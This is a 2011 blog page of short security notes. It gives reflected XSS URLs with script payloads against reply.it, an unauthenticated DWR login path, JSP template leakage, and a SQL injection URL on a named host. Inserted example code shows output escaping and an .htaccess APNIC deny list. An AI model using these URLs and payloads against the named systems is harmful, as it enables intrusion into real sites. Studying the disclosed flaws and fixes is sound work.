Tuesday, 22 November 2011

XSS on www.reply.it - security vulnerabilities


XSS
reply.it/it/search/?lang=IT&search=<script>alert(1);</script>
XSS
http://www.reply.it/en/tagSearch?tags=Financial+Reports%3Cscript%3Ealert%281%29;%3C/script%3E

Mirror (?), same issues:
http://d3v578iyw1eidm.cloudfront.net/
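The two reflected XSS findings above both come down to a query parameter being written back into the HTML unencoded. The following is an added example (not code from the original post, nor from reply.it): it decodes the query string once, the way a servlet container would, then shows the raw reflection beside an HTML-entity-encoded one using the payloads quoted above. The rendering functions are hypothetical stand-ins for the site's JSP output; only the query strings are taken from the post.

```python
import html
from urllib.parse import urlsplit, unquote_plus

# Request URLs modelled on the two findings above (query strings copied from
# the post; the scheme/host are only used for parsing).
REPORTED_URLS = [
    "http://reply.it/it/search/?lang=IT&search=<script>alert(1);</script>",
    "http://www.reply.it/en/tagSearch?tags=Financial+Reports%3Cscript%3Ealert%281%29;%3C/script%3E",
]


def reflected_param(url, name):
    """Decode the query string exactly once (percent-decoding, '+' to space)
    and return the value of `name`, or '' if absent. Splitting on '&' only is
    deliberate: ';' inside a value must not start a new pair."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            return unquote_plus(value)
    return ""


def render_vulnerable(value):
    """Hypothetical version of what the page does today: raw interpolation."""
    return f"<p>Results for: {value}</p>"


def render_hardened(value):
    """Hardened form: entity-encode <, >, &, ' and " before interpolation,
    so the browser treats the parameter as text, never as markup."""
    return f"<p>Results for: {html.escape(value, quote=True)}</p>"


def contains_script_tag(markup):
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in markup.lower()


def check(url, name):
    """Compare raw and escaped reflection of one parameter from one URL."""
    value = reflected_param(url, name)
    return {
        "param": value,
        "vulnerable_has_script": contains_script_tag(render_vulnerable(value)),
        "hardened_has_script": contains_script_tag(render_hardened(value)),
        "hardened": render_hardened(value),
    }


if __name__ == "__main__":
    for url, name in zip(REPORTED_URLS, ["search", "tags"]):
        print(name, check(url, name))
```

Entity encoding is the right fix for a value that lands in an HTML text node or a quoted attribute; a value that ends up inside a `<script>` block or a URL needs the encoding for that context instead.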



Several problems in the JSP scripts (unhandled null exceptions, template data exposed in the output, etc.).

The template(?) is visible when requesting a wrong id (?):
http://reply.it/it/practices/cloudcomputing/readd,7700-


Sample of the output (e.g. http://reply.it/it/practices/cloudcomputing/readd,7700- ):
---------------
<div class="yui-gc clear" id="unacolonna">
                              <div class="yui-u first" id="col_2_3_sx">
                                     <div class="tab">
                              ^service_link^
                                            
                              ^tag_contenuto^
         ^dettaglio_contenuto^
              
                                </div>
                               </div>
                        <div class="yui-gb">
                             ^box_jolly_cx_2^
                             ^box_jolly_cx_3^
                             ^box_jolly_cx_4^
--------------- 

It's possible to add data via POST and have it parsed within the template.
(Useless... but it could be used as a possible XSS vector.)
 
--------------- 
Bug in the Getahead DWR library (Ajax for Java)... (old version?).
It's possible to log in without logging in
(a simple request to this path):
http://www.reply.it/WPSReply2009/dwr/exec/RegistrationHandler.loginUser.dwr 

Block spam from Asia/China: .htaccess solution

After receiving tons of spam on the website I've decided to ban the whole of APNIC...
Previously I tried to ban only China and Korea, but without success.
Since I haven't found anything that bans the whole of APNIC, I looked up the address classes assigned to it.

P.S. I've added a few LACNIC ranges too.

Just add this to a .htaccess file and the spam from Asia should be gone:

#list retrieved from
#http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt

#Banning APNIC
deny from 1.0.0.0/8
deny from 27.0.0.0/8
deny from 36.0.0.0/8
deny from 39.0.0.0/8
deny from 42.0.0.0/8
deny from 43.0.0.0/8
deny from 49.0.0.0/8
deny from 58.0.0.0/8
deny from 59.0.0.0/8
deny from 60.0.0.0/8
deny from 61.0.0.0/8
deny from 101.0.0.0/8
deny from 103.0.0.0/8
deny from 106.0.0.0/8
deny from 110.0.0.0/8
deny from 111.0.0.0/8
deny from 112.0.0.0/8
deny from 113.0.0.0/8
deny from 114.0.0.0/8
deny from 115.0.0.0/8
deny from 116.0.0.0/8
deny from 117.0.0.0/8
deny from 118.0.0.0/8
deny from 119.0.0.0/8
deny from 120.0.0.0/8
deny from 121.0.0.0/8
deny from 122.0.0.0/8
deny from 123.0.0.0/8
deny from 124.0.0.0/8
deny from 125.0.0.0/8
deny from 126.0.0.0/8
deny from 133.0.0.0/8
deny from 150.0.0.0/8
deny from 153.0.0.0/8
deny from 163.0.0.0/8
deny from 171.0.0.0/8
deny from 175.0.0.0/8
deny from 180.0.0.0/8
deny from 182.0.0.0/8
deny from 183.0.0.0/8
deny from 202.0.0.0/8
deny from 203.0.0.0/8
deny from 210.0.0.0/8
deny from 211.0.0.0/8
deny from 218.0.0.0/8
deny from 219.0.0.0/8
deny from 220.0.0.0/8
deny from 221.0.0.0/8
deny from 222.0.0.0/8
deny from 223.0.0.0/8


Don't do this if you have content that should be available to people in Asia.
I'm not racist, but the content of my website is not intended for an Asian audience, and any Asian visitor can understand that I'm just cutting down on spam.
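Before deploying a list of /8 deny rules it is worth checking which of your own legitimate visitors it would lock out, and whether your Apache version still understands `deny from` at all (Apache 2.4 moved to `Require` in mod_authz_core; `deny from` only keeps working through mod_access_compat). The script below is an added example, not part of the original post: it parses `deny from` lines, tests sample addresses against them, and emits the equivalent Apache 2.4 `<RequireAll>` block. The embedded ruleset is an excerpt of the list above, and the visitor addresses are constructed from documentation ranges.

```python
import ipaddress

# Excerpt of the deny list from the post above (a few entries only);
# paste the full list into HTACCESS_TEXT to check the real ruleset.
HTACCESS_TEXT = """\
#Banning APNIC
deny from 1.0.0.0/8
deny from 27.0.0.0/8
deny from 36.0.0.0/8
deny from 202.0.0.0/8
deny from 203.0.0.0/8
deny from 223.0.0.0/8
"""

# Constructed sample of visitor addresses (documentation/test ranges, not
# real visitors); in practice read these from your access log.
SAMPLE_VISITORS = ["1.2.3.4", "198.51.100.7", "203.0.113.5", "192.0.2.10", "223.255.255.1"]


def parse_deny_rules(text):
    """Return the networks named by 'deny from' lines; comments and blank
    lines are skipped, anything else is ignored rather than guessed at."""
    nets = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) == 3 and parts[0].lower() == "deny" and parts[1].lower() == "from":
            nets.append(ipaddress.ip_network(parts[2], strict=False))
    return nets


def is_denied(ip, nets):
    """True if the address falls inside any denied network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def blocked_visitors(ips, nets):
    """Subset of `ips` the ruleset would reject, in input order."""
    return [ip for ip in ips if is_denied(ip, nets)]


def to_apache24(nets):
    """Apache 2.4 (mod_authz_core) equivalent of the deny list: allow
    everyone, then subtract each network."""
    lines = ["<RequireAll>", "    Require all granted"]
    lines += [f"    Require not ip {net}" for net in nets]
    lines.append("</RequireAll>")
    return "\n".join(lines)


if __name__ == "__main__":
    nets = parse_deny_rules(HTACCESS_TEXT)
    print("blocked visitors:", blocked_visitors(SAMPLE_VISITORS, nets))
    print(to_apache24(nets))
```

Run it once against a day of real client addresses from your access log: if the blocked list contains anyone you want to keep, trim the ruleset before installing it.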

Another SQL injection... boring.

http://host52-172-static.59-217-b.business.telecomitalia.it/fp/halunni.php?Cls=1N


SQL injection (found via Google)